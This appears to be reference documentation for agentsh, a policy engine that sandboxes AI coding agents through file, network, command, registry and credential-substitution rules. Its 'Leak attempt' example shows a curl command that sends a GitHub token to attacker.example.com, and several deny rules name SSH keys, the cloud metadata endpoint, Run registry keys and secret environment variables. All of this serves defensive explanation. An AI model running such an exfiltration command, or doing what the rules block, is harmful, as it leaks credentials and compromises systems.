Home GitHub

Policy Reference

Deterministic policy schema for controlling file, network, command, signal, registry, and package access at the execution layer.

Policy Model#

Decisions

DecisionDescription
allowPermit the operation
denyBlock the operation
approveRequire human approval
redirectSwap to a different target
auditAllow + log (explicit logging)
soft_deleteQuarantine with restore option

Scopes

Evaluation

First matching rule wins. Rules live in a named policy; sessions choose a policy at creation time.

File Rules#

Control file system operations by path and operation type.

file_rules:
  # Allow reading workspace
  - name: allow-workspace-read
    paths:
      - "/workspace"
      - "/workspace/**"
    operations: [read, open, stat, list, readlink]
    decision: allow

  # Require approval for deletes
  - name: approve-workspace-delete
    paths: ["/workspace/**"]
    operations: [delete, rmdir]
    decision: approve
    message: "Agent wants to delete: {{.Path}}"
    timeout: 5m

  # Block sensitive paths
  - name: deny-ssh-keys
    paths: ["/home/**/.ssh/**", "/root/.ssh/**"]
    operations: ["*"]
    decision: deny

Operations: read, open, stat, list, readlink, write, create, mkdir, chmod, rename, delete, rmdir, * (all)

Network Rules#

Control network connections by domain, CIDR, or port.

network_rules:
  # Allow package registries
  - name: allow-npm
    domains: ["registry.npmjs.org", "*.npmjs.org"]
    ports: [443, 80]
    decision: allow

  # Block private networks
  - name: block-private
    cidrs:
      - "10.0.0.0/8"
      - "172.16.0.0/12"
      - "192.168.0.0/16"
    decision: deny

  # Block cloud metadata
  - name: block-metadata
    cidrs: ["169.254.169.254/32"]
    decision: deny

  # Approve unknown HTTPS
  - name: approve-unknown
    ports: [443]
    decision: approve
    message: "Connect to {{.RemoteAddr}}:{{.RemotePort}}?"

HTTP Services#

HTTP services let you give an agent fine-grained access to third-party APIs — GitHub, Stripe, Slack, Jira, and others — without ever exposing the real credential. Each entry in the http_services: key declares everything in one place: the upstream URL, path/method filtering rules, and credential substitution settings.

http_services:
  - name: github
    upstream: https://api.github.com
    default: deny
    rules:
      - name: read-issues
        methods: [GET]
        paths: ["/repos/myorg/*/issues", "/repos/myorg/*/issues/*"]
        decision: allow
    secret:
      ref: vault://kv/github#token
      format: "ghp_{rand:36}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true

The three pieces of each entry:

An entry can use all three pieces together (the common case), or use only routing (for open APIs that don't need credentials) or only credentials (for services where the agent already knows the endpoint). An entry must declare at least one of rules or secret.

When to use http_services instead of network_rules. Use http_services when you want fine-grained control over which API paths and methods the agent may call, combined with credential substitution. Use network_rules for everything else: arbitrary outbound HTTP, non-HTTP protocols, or cases where you don't need path-level filtering or credential management.

What does not fit http_services:

Routing & Filtering#

Each http_services: entry names a service, points it at an upstream URL, and declares path/method rules that control what the agent may access. The complete schema:

http_services:
  - name: github                       # service identifier; agent calls /svc/github/...
    upstream: https://api.github.com   # upstream URL
    expose_as: GITHUB_API_URL          # optional env var name; derived from name if empty
    aliases:                           # optional extra hostnames for fail-closed checks
      - api.github.example.com
    allow_direct: false                # escape hatch; default false
    default: deny                      # allow | deny; default depends on context

    # Path/method filtering rules (optional)
    rules:
      - name: read-contents
        methods: [GET]                 # empty list or "*" means any method
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow
      - name: read-write-issues
        methods: [GET, POST]
        paths: ["/repos/myorg/myrepo/issues", "/repos/myorg/myrepo/issues/*"]
        decision: allow

    # Credential substitution (optional)
    secret:
      ref: vault://kv/github#token     # secrets URI
      format: "ghp_{rand:36}"          # fake credential format
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true               # replace real creds in responses with fakes

Service-level fields:

Per-rule fields under rules::

Rule matching#

Each rule under rules: matches an incoming request by both its path and its method. agentsh evaluates rules in declaration order; the first rule whose path glob and method list both match wins. If no rule matches, the service's default: applies (which itself defaults to deny). This subsection covers the two parts users get wrong most often: how the path glob behaves, and how to order rules so the right one wins.

Path matching

Paths are gobwas/glob patterns with / as the separator. * matches any sequence of non-separator characters; ** matches across separators; ? matches a single character; [abc] matches a character class. Patterns match against the request path relative to the service's upstream — the gateway prefix /svc/<name> has already been stripped by the time the rule engine sees the path.

PatternMatchesDoes not match
/users/users/users/123
/users/*/users/123/users/123/posts
/users/**/users/123/posts and /users/123/orgs
/repos/*/contents/**/repos/myorg/myrepo/contents/src/file.go/repos/myorg

Method matching

The methods: field lists HTTP methods the rule applies to, e.g., methods: [GET, POST]. Two shorthand forms also match any method: omitting the field entirely, and the literal value methods: ["*"].

First-match semantics

When two rules could both match a request, the rule that appears first in the rules: list wins. Order rules from most specific to least specific. The classic mistake is to put a broad allow first and an exception deny second — the broad allow consumes the request and the deny is never reached. Always put the exception first:

http_services:
  - name: github
    upstream: https://api.github.com
    default: deny
    rules:
      # Deny FIRST: a narrow exception inside an otherwise-allowed range
      - name: block-secrets-dir
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/secrets/**"]
        decision: deny
        message: "Block read access to secrets directory"

      # Then the broad allow
      - name: allow-repo-reads
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow

If you reversed the order, the broad allow-repo-reads would match a request to /repos/myorg/myrepo/contents/secrets/db.env and the narrower deny would never fire.

Decision values

The decision: field on each rule takes one of four values, only two of which are currently wired:

Use allow and deny only. The other two values are accepted by the parser but have no runtime effect.

Credential Substitution#

Credential substitution is declared directly on each http_services: entry via the secret, inject, and scrub_response fields. At session start, agentsh fetches the real credential, generates a format-matched fake, and exposes only the fake to the agent. On the wire, fake credentials are swapped for real ones transparently.

secret

The secret object tells agentsh where to find the real credential and how to generate its fake replacement:

inject

The inject object controls how the real credential is placed on outbound requests. Requires secret to be set.

scrub_response

When scrub_response: true, the post-hook scans response bodies for the real credential and replaces it with the fake before returning to the agent. Use this for endpoints that echo the credential back (e.g., a "whoami" endpoint that returns the bearer token in JSON).

fake_format syntax

The secret.format string must contain exactly one {rand:N} placeholder, where N is the number of random base62 characters to generate. The placeholder may be preceded by a literal prefix (e.g., the upstream API's token prefix) but it must appear at the end of the string — no characters after it.

Constraints:

Base62 alphabet used: A-Z a-z 0-9.

Per-provider fake format suggestions

These suggestions match the real-credential prefixes used by each upstream API. Use them when wiring up a new service so the fake is indistinguishable from a real token at the format level. Adjust N upward if your upstream's tokens are longer.

Upstream APIReal prefixSuggested format
GitHub PAT (classic)ghp_"ghp_{rand:36}"
GitHub PAT (fine-grained)github_pat_"github_pat_{rand:72}"
Stripe (secret key)sk_live_ / sk_test_"sk_test_{rand:24}"
Slack bot tokenxoxb-"xoxb-{rand:48}"
Slack user tokenxoxp-"xoxp-{rand:48}"
Jira / Atlassian API token(no prefix)"{rand:24}"
PagerDuty(no prefix)"{rand:24}"
Datadog API key(no prefix)"{rand:32}"
SendGridSG."SG.{rand:66}"

Note on Anthropic and OpenAI keys: These are handled by the agentsh DLP proxy, a separate feature. Do not declare an http_services entry for Anthropic or OpenAI completion endpoints.

Wire-level flow

When the agent sends a request through the gateway, agentsh processes it in five steps:

  1. Route: The gateway receives the request at /svc/<name>/..., strips the prefix, and matches path + method against the declared rules. If the decision is deny, the request stops here.
  2. Substitute: If the entry has a secret, the CredsSubHook pre-hook scans the request body, all header values, the URL query string, and the URL path for the fake credential and replaces each occurrence with the real one.
  3. Inject: If inject.header is set, agentsh sets the header from the template (overwriting any value the agent supplied).
  4. Forward: The request goes to the upstream URL with real credentials in place.
  5. Scrub: When scrub_response: true, the post-hook scans the response body for the real credential and replaces it with the fake before returning to the agent.

Leak Guard#

The leak guard is the third hook in the credential pipeline (after the substitution and header-injection hooks). It enforces that fake credentials never leave agentsh through any path other than the legitimate substitution flow. If the agent grabs a fake credential from its environment and tries to send it to a host that does not own that credential — an attacker-controlled endpoint, a logging service, a webhook, or even a different declared service — the leak guard intercepts and denies the request with HTTP 403.

Without the leak guard, an agent that learned its environment contained a credential could exfiltrate the fake to an attacker. The attacker would then try to use the fake against the upstream API and fail (because the fake doesn't authenticate), but they would have learned the agent's identity, the format of the credential, and potentially used the leak as a side-channel for other data.

What the leak guard inspects

For every outbound HTTPS request that the proxy sees, the LeakGuardHook scans:

It looks for any fake credential in agentsh's per-session table.

The cross-service rule

The check is cross-service, not blanket. A fake credential discovered on a request to its own service is fine — that's the legitimate substitution path, and the substitution hook will swap the fake for the real one before forwarding. The leak guard only blocks when a fake belongs to service A and the request is destined for service B (or to no declared service at all). Concretely:

Fake credential of serviceDestination hostOutcome
githubapi.github.comAllowed — substituted by CredsSubHook
githubapi.stripe.comBlocked — fake of one service on another
githubattacker.example.comBlocked — fake on an undeclared host
(none)anyNot checked — nothing to leak

What the agent sees on a leak attempt

The denial returns HTTP 403 "credential leak blocked". The agent sees a normal-looking 403 from its outbound HTTP client — deliberately the same shape as a network policy denial, so the agent cannot infer "you tried to leak GitHub credentials" as a side-channel signal.

On the agentsh side, the event is logged via slog.Warn as secret_leak_blocked with structured fields session_id, request_id, service_name (the service the leaked fake belongs to), and request_host. This is a structured log line, not a typed audit event (see Known Limitations).

Coverage

The leak guard runs inside the same TLS-terminating proxy that handles substitution, so it inspects HTTPS traffic and plain HTTP traffic equally. Non-HTTP protocols and direct socket I/O are not inspected by the leak guard — those are governed by the broader network rules. If you allow raw outbound TCP to a host, the leak guard cannot scan it.

Examples#

GitHub — read-only repo access with Vault-sourced credentials

This is the most common pattern: routing + filtering + credential substitution in a single entry.

providers:
  vault:
    type: vault
    address: https://vault.corp.internal:8200
    auth:
      method: kubernetes
      kube_role: agentsh-prod

http_services:
  - name: github
    upstream: https://api.github.com
    expose_as: GITHUB_API_URL
    default: deny
    rules:
      - name: read-repo-contents
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow
      - name: read-create-issues
        methods: [GET, POST]
        paths: ["/repos/myorg/myrepo/issues"]
        decision: allow
      - name: read-update-single-issue
        methods: [GET, PATCH]
        paths: ["/repos/myorg/myrepo/issues/*"]
        decision: allow
    secret:
      ref: vault://kv/github#token
      format: "ghp_{rand:36}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true

At session start, agentsh:

  1. Generates a fake token like ghp_aB3xZk9... (36 random base62 chars after the ghp_ prefix)
  2. Sets GITHUB_API_URL in the sub-process env to the local gateway URL
  3. Resolves vault://kv/github#token and caches the real token in memory

The agent calls:

curl -H "Authorization: Bearer $GITHUB_TOKEN" \
     "$GITHUB_API_URL/repos/myorg/myrepo/issues"

agentsh matches /repos/myorg/myrepo/issues against read-create-issues (GET allowed), swaps the fake token for the real one, forwards to https://api.github.com, and scrubs the real credential from the response before returning it to the agent.

Stripe — payments API with method restrictions

http_services:
  - name: stripe
    upstream: https://api.stripe.com
    default: deny
    rules:
      - name: read-customers
        methods: [GET]
        paths: ["/v1/customers", "/v1/customers/*"]
        decision: allow
      - name: create-payment-intent
        methods: [POST]
        paths: ["/v1/payment_intents"]
        decision: allow
      - name: block-refunds
        methods: [POST]
        paths: ["/v1/refunds"]
        decision: deny
    secret:
      ref: vault://kv/stripe#api_key
      format: "sk_test_{rand:24}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"

Slack — post messages only

http_services:
  - name: slack
    upstream: https://slack.com/api
    default: deny
    rules:
      - name: post-message
        methods: [POST]
        paths: ["/chat.postMessage"]
        decision: allow
      - name: list-channels
        methods: [GET, POST]
        paths: ["/conversations.list"]
        decision: allow
    secret:
      ref: op://Engineering/slack-bot#credential
      format: "xoxb-{rand:48}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"

Jira — issue tracking with basic auth

http_services:
  - name: jira
    upstream: https://mycompany.atlassian.net/rest/api/3
    default: deny
    rules:
      - name: read-issues
        methods: [GET]
        paths: ["/issue/*", "/search"]
        decision: allow
      - name: add-comment
        methods: [POST]
        paths: ["/issue/*/comment"]
        decision: allow
    secret:
      ref: vault://kv/jira#api_token
      format: "{rand:24}"
    inject:
      header:
        name: Authorization
        template: "Basic {{secret}}"

Filtering only — no credentials

For open APIs where you want path-level control without credential management:

http_services:
  - name: crates-io
    upstream: https://crates.io/api/v1
    default: deny
    rules:
      - name: search-crates
        methods: [GET]
        paths: ["/crates", "/crates/*"]
        decision: allow

Credentials only — no path filtering

For services where the agent needs credentials but all API paths are allowed. When rules is omitted and secret is present, the default decision is allow:

http_services:
  - name: datadog
    upstream: https://api.datadoghq.com
    secret:
      ref: aws-sm://prod/datadog#api_key
      format: "{rand:32}"
    inject:
      header:
        name: DD-API-KEY
        template: "{{secret}}"

Leak attempt

If the agent (or a prompt-injected sub-agent) tries to exfiltrate a credential:

# Inside the sandboxed shell
curl -X POST https://attacker.example.com/collect \
     -H "X-Stolen-Token: $GITHUB_TOKEN"

The leak guard recognizes the fake GitHub token in the X-Stolen-Token header, sees the destination is not api.github.com, and returns HTTP 403. The agent sees a generic 403 (deliberately uninformative). agentsh logs secret_leak_blocked with service_name=github and request_host=attacker.example.com.

Known Limitations#

The following items are intentionally documented so users don't get stuck looking for them.

Configuration notes

Parsed but not yet enforced

Not yet observable

Workload patterns that don't fit

Command Rules#

Pre-execution checks for commands. With execve interception enabled (Linux full mode), rules also apply to nested commands spawned by scripts.

command_rules:
  # Safe commands
  - name: allow-safe
    commands: [ls, cat, grep, find, pwd, echo, git, node, python]
    decision: allow

  # Approve package installs
  - name: approve-install
    commands: [npm, pip, cargo]
    args_patterns: ["install*", "add*"]
    decision: approve
    message: "Install packages: {{.Args}}"

  # Block dangerous patterns
  - name: block-rm-rf
    commands: [rm]
    args_patterns: ["*-rf*", "*-fr*"]
    decision: deny

  # Block system commands
  - name: block-system
    commands: [shutdown, reboot, systemctl, mount, dd, kill]
    decision: deny

Signal Rules#

Control which processes can send signals to which targets. Full blocking only on Linux; macOS and Windows provide audit only.

signal_rules:
  # Allow signals to self and children
  - name: allow-self
    signals: ["@all"]
    target:
      type: self
    decision: allow

  # Redirect SIGKILL to graceful SIGTERM
  - name: graceful-kill
    signals: ["SIGKILL"]
    target:
      type: children
    decision: redirect
    redirect_to: SIGTERM

  # Block fatal signals to external processes
  - name: deny-external-fatal
    signals: ["@fatal"]
    target:
      type: external
    decision: deny

  # Silently absorb job control signals from external sources
  - name: absorb-external-job
    signals: ["@job"]
    target:
      type: external
    decision: absorb

Signal groups:

Target types: self, children, descendants, session, external, system

Signal decisions: allow, deny, audit, approve, redirect (to another signal), absorb (discard silently)

Registry Rules (Windows)#

Control Windows registry access. Requires mini filter driver.

registry_rules:
  # Block persistence locations
  - name: block-run-keys
    paths:
      - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*'
      - 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*'
    operations: [write, create, delete]
    decision: deny

  # Block security settings
  - name: block-defender
    paths: ['HKLM\SOFTWARE\Policies\Microsoft\Windows Defender*']
    operations: [write, create, delete]
    decision: deny

  # Allow reads everywhere
  - name: allow-read
    paths: ["*"]
    operations: [read]
    decision: allow

Resource Limits#

Constrain resource usage per session. Full enforcement on Linux only.

resource_limits:
  # Memory
  max_memory_mb: 2048
  memory_swap_max_mb: 0

  # CPU
  cpu_quota_percent: 80

  # Disk I/O
  disk_read_bps_max: 104857600   # 100 MB/s
  disk_write_bps_max: 52428800   # 50 MB/s

  # Network
  net_bandwidth_mbps: 100

  # Process limits
  pids_max: 100

  # Time limits
  command_timeout: 5m
  session_timeout: 4h
  idle_timeout: 30m

MCP Rules#

The mcp_rules section in a policy file defines MCP security enforcement. This is the policy-file equivalent of the sandbox.mcp runtime configuration.

mcp_rules:
  enforce_policy: true

  # Server-level access control
  server_policy: "allowlist"
  allowed_servers:
    - id: "trusted_*"
  denied_servers:
    - id: "untrusted_*"

  # Tool-level access control
  tool_policy: "allowlist"
  allowed_tools:
    - server: "database"
      tool: "query_users"
      content_hash: "sha256:abc123..."
    - server: "notes"
      tool: "read_*"
  denied_tools:
    - server: "*"
      tool: "exec_*"

  # Version pinning
  version_pinning:
    enabled: true
    on_change: "block"
    auto_trust_first: true

  # Cross-server attack detection
  cross_server:
    enabled: true
    read_then_send:
      enabled: true
    burst:
      enabled: true

See the MCP Policy Configuration section for detailed descriptions of each option.

Environment Policy#

Control which environment variables processes can access.

Global policy (applies to all commands)

env_policy:
  # Allowlist - only these vars are visible (supports wildcards)
  allow:
    - "PATH"
    - "HOME"
    - "LANG"
    - "TERM"
    - "NODE_*"          # All NODE_ prefixed vars
    - "npm_*"

  # Denylist - these are always stripped (even if in allow)
  deny:
    - "AWS_*"
    - "GITHUB_TOKEN"
    - "*_SECRET*"
    - "*_KEY"
    - "*_PASSWORD"

  # Size limits
  max_bytes: 1000000     # Max total env size
  max_keys: 100          # Max number of variables

  # Block enumeration (env, printenv, /proc/*/environ)
  block_iteration: true

Per-command overrides

Override the global policy for specific commands:

command_rules:
  # npm needs registry tokens
  - name: npm-with-tokens
    commands: [npm]
    decision: allow
    env_allow:
      - "NPM_TOKEN"
      - "NODE_AUTH_TOKEN"
    env_deny:
      - "AWS_*"           # Still deny cloud creds

  # Build tools get more env access
  - name: build-tools
    commands: [make, cargo, go]
    decision: allow
    env_allow:
      - "CC"
      - "CXX"
      - "GOPATH"
      - "CARGO_*"
    env_max_bytes: 500000
    env_max_keys: 50

  # Prevent scripts from discovering env vars
  - name: untrusted-scripts
    commands: [python, node, ruby]
    args_patterns: [".*\\.sh$", ".*eval.*"]
    decision: allow
    env_block_iteration: true

Environment Injection#

Inject operator-trusted environment variables into every command execution, regardless of the parent environment. Injected variables bypass env_policy filtering since they are configured by the operator.

Use cases

Global configuration

Set in your config.yml to apply to all executions:

sandbox:
  env_inject:
    BASH_ENV: "/usr/lib/agentsh/bash_startup.sh"
    # Add custom variables as needed
    MY_CUSTOM_VAR: "value"

Policy-level configuration

Override or extend global settings in a policy file:

version: 1
name: my-policy

env_inject:
  BASH_ENV: "/etc/mycompany/bash_startup.sh"
  EXTRA_VAR: "policy-specific"

# ... rest of policy

Merge behavior

Bundled bash startup script

agentsh includes a script at /usr/lib/agentsh/bash_startup.sh that disables bash builtins which could bypass seccomp policy enforcement:

#!/bin/bash
# Disable builtins that bypass seccomp policy enforcement
enable -n kill      # Signal sending
enable -n enable    # Prevent re-enabling
enable -n ulimit    # Resource limits
enable -n umask     # File permission mask
enable -n builtin   # Force builtin bypass
enable -n command   # Function/alias bypass

This script is included in Linux packages (deb, rpm, arch, tarballs). Set BASH_ENV to this path to automatically disable these builtins in bash sessions.

Package Rules#

Package rules control what happens when an agent installs packages. Each rule has a match object and an action. Rules are evaluated top-to-bottom; the first match wins.

FieldTypeDescription
match.packagesstring[]Exact package names
match.name_patternsstring[]Glob/regex patterns for package names
match.finding_typestringType of finding: vulnerability, license, malware, typosquat, provenance, reputation
match.severitystringMinimum severity: critical, high, medium, low, info
match.reasonsstring[]Specific reason codes to match
match.license_spdx.allowstring[]Allowlisted SPDX license identifiers
match.license_spdx.denystring[]Denylisted SPDX license identifiers
match.ecosystemstringPackage ecosystem: npm, pypi, cargo, etc.
actionstringallow, warn, approve, or block
reasonstringHuman-readable reason for the rule
 
package_rules:
  # Block critical vulnerabilities
  - match:
      finding_type: vulnerability
      severity: critical
    action: block
    reason: "Critical vulnerability detected"

  # Block malware and typosquats
  - match:
      finding_type: malware
    action: block

  - match:
      finding_type: typosquat
    action: block

  # Block copyleft licenses
  - match:
      finding_type: license
      license_spdx:
        deny: [GPL-2.0-only, GPL-3.0-only, AGPL-3.0-only]
    action: block

  # Warn on medium vulnerabilities
  - match:
      finding_type: vulnerability
      severity: medium
    action: warn

  # Allow a specific trusted package regardless of findings
  - match:
      packages: [lodash]
    action: allow

DNS Redirects#

DNS redirect rules steer domain resolution at the ptrace level. When a traced process resolves a domain matching a rule, the DNS response is rewritten to the specified IP address. Available in ptrace mode only.

FieldTypeDescription
namestringRule name (for logging)
matchstringRegex pattern to match against the queried domain
resolve_tostringIP address to return instead of the real resolution
visibilitystringsilent, audit_only, or warn
on_failurestringfail_closed, fail_open, or retry_original
 
dns_redirects:
  # Redirect npm registry to internal mirror
  - name: npm-mirror
    match: "^registry\\.npmjs\\.org$"
    resolve_to: "10.0.1.50"
    visibility: audit_only
    on_failure: retry_original

  # Redirect all PyPI traffic
  - name: pypi-mirror
    match: "^(files|upload)\\.pythonhosted\\.org$"
    resolve_to: "10.0.1.51"
    visibility: silent
    on_failure: fail_closed

Connect Redirects#

Connect redirect rules steer outbound TCP connections at the ptrace level. When a traced process connects to a host:port matching a rule, the connection is redirected to the specified destination. Supports optional TLS SNI rewriting. Available in ptrace mode only.

FieldTypeDescription
namestringRule name (for logging)
matchstringRegex pattern to match against host:port
redirect_tostringNew host:port destination
tls.modestringpassthrough or rewrite_sni
tls.snistringNew SNI value (required when mode is rewrite_sni)
visibilitystringsilent, audit_only, or warn
on_failurestringfail_closed, fail_open, or retry_original
 
connect_redirects:
  # Route API traffic through internal proxy
  - name: api-proxy
    match: "^api\\.openai\\.com:443$"
    redirect_to: "proxy.internal:8443"
    tls:
      mode: rewrite_sni
      sni: "api.openai.com"
    visibility: audit_only
    on_failure: fail_closed

Transparent Commands Override#

Control which commands are transparently unwrapped by the execve interceptor. When a transparent command (like sudo, env, or nice) is detected, agentsh unwraps it and evaluates the payload command against policy instead. You can add custom wrappers or remove built-in ones.

transparent_commands:
  # Add custom task runners to the transparent list
  add:
    - myrunner
    - taskrunner
    - doas

  # Remove commands from the built-in defaults
  remove:
    - sudo     # Evaluate sudo itself, don't unwrap

Built-in transparent commands include: sudo, env, nice, nohup, timeout, strace, ltrace, time, xargs.

Starter Policy Packs#

Pre-built policies for common scenarios:

dev-safe.yaml

Safe for local development.

ci-strict.yaml

Safe for CI runners.

agent-sandbox.yaml

"Agent runs unknown code" mode.

agent-default.yaml

Comprehensive policy for AI coding agents (Claude Code, Codex CLI, etc.). Designed for use with agentsh wrap.

Policy Signing#

Policy files can be cryptographically signed with Ed25519 keys to prove authorship and detect tampering. When signing is enabled, agentsh verifies each policy file against a trust store of public keys before loading it.

Configuration

policies:
  signing:
    trust_store: "/etc/agentsh/keys/"   # Directory of trusted Ed25519 public key JSON files
    mode: "enforce"                    # "enforce" | "warn" | "off" (default: "off")
FieldTypeDefaultDescription
policies.signing.trust_storestringPath to directory containing trusted public key JSON files. Each file contains an Ed25519 public key with key_id, label, and optional expires_at.
policies.signing.modestringoffenforce — reject policies with invalid or missing signatures (server refuses to start). warn — log a warning, load anyway. off — skip verification.

Signature file format

Each signed policy policy.yaml has a companion policy.yaml.sig file:

{
  "key_id": "a1b2c3d4e5f6...",     // hex(SHA256(public_key_bytes))
  "signature": "base64-encoded...", // Ed25519 detached signature
  "signer": "security-team",       // human-readable label
  "signed_at": "2026-03-18T..."    // ISO 8601 timestamp
}

Verification in all loading paths

Signature verification runs in all four policy loading paths:

Every verification — success or failure — generates an audit event with key_id, signer, signed_at, and the verification result. Failure reasons include invalid_signature, unknown_key, missing_signature, and expired_key.

See Features → Policy Signing for the CLI workflow (keygen, sign, verify) and Setup → Policy Signing for configuration guidance.